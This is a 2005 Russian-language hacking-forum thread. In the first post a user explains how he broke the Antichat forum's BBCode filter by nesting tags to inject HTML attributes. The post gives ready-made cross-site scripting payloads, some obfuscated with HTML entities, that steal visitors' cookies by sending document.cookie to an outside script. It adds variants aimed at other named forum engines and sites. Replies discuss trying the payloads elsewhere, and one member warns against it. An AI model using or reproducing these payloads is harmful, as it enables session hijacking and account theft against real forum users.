ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Долго жданная статья как ломать античатовскй форум.
  #1  
Старый 17.10.2005, 21:16
Аватар для rat
rat
Banned
Регистрация: 15.08.2005
Сообщений: 2
Провел на форуме:
24953

Репутация: 0
Post Долго жданная статья как ломать античатовскй форум.

Начал Я изучать форум античата с Января этого года.

Бла бла под конец - Я его взломал.

Вот как Я его ломал.



Должен сказать сразу, что после того как Я нашёл багу на античате, Я сразу рассказал её четырём юзером античата.

Сначало Zadoxlik`у, потом моему лучшему другу на интернете xSpider`у и третьему человеку Я рассказал Jazzsummerman, который потом случайно рассказал Че Геваре который и прикрыл эту багу прежде тем, как Я ей сумел воспользовался. Без обид, что было то было.

Объяснять красивым языком как Алгол, Zadoxlik Jazzsummerman Я ещё не научился, так что расскажу как могу.




Первоначальная ошибка состоит в том, что теги
Код HTML:
[url=http://www.antichat.ru]http://www.antichat.ru[url][/url][/url]
Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj очень плохо отфильтрированны.


Перебрав десятки комбинаций и изучив все теги античатовского форума, Я решил засунуть один тег урл в другой тег урл.

Вот так:

[/URL]В результате, Я получил следующее:

Код HTML:
<a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj" target="_blank">http://www.wj.com]wj </a></a>
Думаю тут всё и так ясно. Второй тег урл, зашёл в атрибут первого тега урл.

После этого, Я задал такой запрос античатовскому форуму:

Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial]wj[/FONT][/url]
[/URL]
И вот что он мне выдал:

[HTML]<a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial&quot;>wj</font>" target="_blank">http://www.wj.com]wj <font face="Arial">wj</font></a></a>[HTML]

Как уже заметно, из-за того, что теги урл фильтрируют все кавычки, nj второй тег урл отфильтрировал кавычки в теги фонт, после чего кавычки перестали существовать вообще, что Я и сам сразу не заметил. И естественно теперь одним пробелом, который как специально для нас разрешён (Тут можно прочитать подробнее о том, что становится когда кавычек нет и добавляется пробел http://www.antichat.ru/crackchat/index.html )
мы теперь можем вписывать произвольной код.


Долго не буду рассказывать, что пропускается в каждом теги античата, которые мне пришлось из-за нужды вызубрить наизусть, но просто скажу, что в теги фонт, не пропускается двоеточие. <:> Эта проблема меня заставила искать помощь у других Хакеров античата.

Естественно мне помог мой лучший друг по имени хSpider которые посоветовал мне использовать html объекты.

Должен сказать, что алёрт у меня был и без них, через такой код.

Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial size=+7 onmouseover=alert(/Hello_from_WJ/) /]wj[/FONT][/url][/URL]
Результат:

Код HTML:
<a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial size=100 onmouseover=alert(/Hello_from_WJ/) /&quot;>wj</font>" target="_blank">http://www.wj.com]wj &lt;font face=&quot;Ar.../) /&quot;&gt;wj&lt;/font&gt;</a></a>
При проведении мышки на WJ, выскакивал алёрт.

Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом.
Цитата:
&******#58;
Знаю, Я и сам удился. Сто раз про это читал и т.д. и только вспомнил, что он есть и им можно воспользовался. Ещё давно мне даже Железо показывал мылы тырить через эти символы, но почему то мне это не пришло в голову.

После этого, используя эту ссылку, http://www.h4cky0u.org/encrypt/index.php Я закодировал свой код? и вот что меня получилось....



[HTML]http://www.]wj [/URL][HTML


Это воровало куки на ура.


Вот код для желающих как ломать веб-хак.

Код HTML:
[color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javaSCrip	t:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color]
Можно ещё и так

Код HTML:
[EMAIL]wj@wj.com[URL=wj/style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ][/URL][/EMAIL]

Для интересующихся как Я ломал форум wapbbs, вот вам один из кодов.

Код HTML:
[r0x][img]http://www.phpbb.com/значениеwjimages/phplogo.gif/style=background&*#58;url(*&#106*;&#9*7;&#1*18;&*#97;&*#115*;&#99*;&#11*4;&#1*05;&#*112;*&#116*;&#58*;&#1*00;&#*111;&*#99;&*#117;*&#109*;&#1*01;&#*110;&*#116*;&#46*;&#10*5;&#1*09;&*#97;*g&#1*01;&*#115;*[*1*]*.src*=&#3*4;&#*104;*&#116*;&#11*6;&#1*12;&*#58;&*#47;*/*&#97*;&#11*0;&#1*16;&*#105*;&#99*;&#10*4;&#*97;&*#116;*.*&#11*4;&#1*17;&*#47;&*#99;&*#103;*&#10*5;&#4*5;&#9*8;&#1*05;&*#110;*/*&#115*;&#46*;&#10*6;&#*112;*&#103*;&#63*;&#34*;+&#1*00;&#*111;*&#99*;ument.cookie); [/img][/r0x]
Вот второй

Код HTML:
[url]http://www.wj.com[img]http://www.wapbbs.com/bbs//images/statusicon/forum_new.gif'='[/img][/url]'
Код воровки кук скопируйте с первого примера.

Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy.
http://www.portswigger.net/proxy/

Сейчас вышли новые форумы, например IPB 2.1.1 и он ломается вот так:

Код HTML:
[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]	[/topic]]
[/post]

Форум phpbb 2.0.17 ломается вот так: (Код надо будет если время и желание будет - доработать.)

Код HTML:
[img]http://www.phpbb.com/wj[email]wj@wj.com[/email]images/phplogo.gif[/img]
phpbb 2.0.17



Структура форума хакер.ру, ломается вот так.

Код HTML:
[URL][img]http://www.wj'='.gif[/img][/URL]'
А так же в самом заголовке и имени тем на этом форуме, разрешается вставка тегов, причём там очень плохая фильтрация. При специальных символах, этот форум ломается на ура как и в теле сообщения, так и в заголовке топиков.



Вот и всё.



White Jordan.
 

  #2  
Старый 17.10.2005, 21:30
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Ща попробую на других форумах статья так не чё.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #3  
Старый 17.10.2005, 21:31
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

Цитата:
Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом &******#58;
На сколько я понял вы действовали вместе ?
 

  #4  
Старый 17.10.2005, 21:34
Аватар для alsa
alsa
Участник форума
Регистрация: 29.03.2005
Сообщений: 226
Провел на форуме:
458690

Репутация: 53
По умолчанию

Зачем забанили такого хорошего автора ? %-)
 

  #5  
Старый 17.10.2005, 21:41
Аватар для alsa
alsa
Участник форума
Регистрация: 29.03.2005
Сообщений: 226
Провел на форуме:
458690

Репутация: 53
По умолчанию

Цитата:
Сообщение от Vandal  
На сколько я понял вы действовали вместе ?
21:40:17: скажи вандалу что нет
21:40:22: работал Я один
21:40:27: топик ответь
21:40:29: Я не могу пока
21:40:42: скажи Белый Джордан говорит что нет
21:40:45: он напомнил
21:40:50: как уже сказал в статье
21:40:53: работал сам
21:41:02: так что хСпайдера за это баннить не стоит
21:41:08: он тут не причём скажи
21:41:14: а то мали ли что
21:41:20: и впрямь бан ему влепят
 

  #6  
Старый 17.10.2005, 21:51
Аватар для silveran
silveran
Постоянный
Регистрация: 02.05.2005
Сообщений: 786
Провел на форуме:
807041

Репутация: 263


Отправить сообщение для silveran с помощью ICQ
По умолчанию

кстати если кому интересно- то он нацелен на то что щас пол ачата ломанётся вапс ломать- люди не советую!!! поимите- не стоит идти на поводу и из за него портить всем жизнь!! запомните- НЕ ДЕЛАЙТЕ ЭТОГО!!! не будте марионетками к его руках!!! если хотите проверить- то проверяйте не на его примерах!
 

  #7  
Старый 17.10.2005, 22:04
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!
 

  #8  
Старый 17.10.2005, 22:08
Аватар для silveran
silveran
Постоянный
Регистрация: 02.05.2005
Сообщений: 786
Провел на форуме:
807041

Репутация: 263


Отправить сообщение для silveran с помощью ICQ
По умолчанию

Цитата:
Сообщение от WizART  
а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!
гыыыыыыыы.... я говорю не риньтесь с дуру веше=ать хакер и вапс- проверяйте для начала на однотипных сайтах)
в будующем советую немного сдержаннее реагировать на мои сообщения)
С Уважением Силверан)))
 

  #9  
Старый 17.10.2005, 22:33
Аватар для -artik-
-artik-
Banned
Регистрация: 13.06.2005
Сообщений: 44
Провел на форуме:
153475

Репутация: 0
Отправить сообщение для -artik- с помощью ICQ
По умолчанию

чет я не понял как с помощью этого - ломануть phpbb 2.0.17
 

  #10  
Старый 17.10.2005, 22:46
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

Я так понимаю что для гринов угрозы никакой не было, т.к. надеюсь что все давно пересели на файрофкс или что-то в этом духе.
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ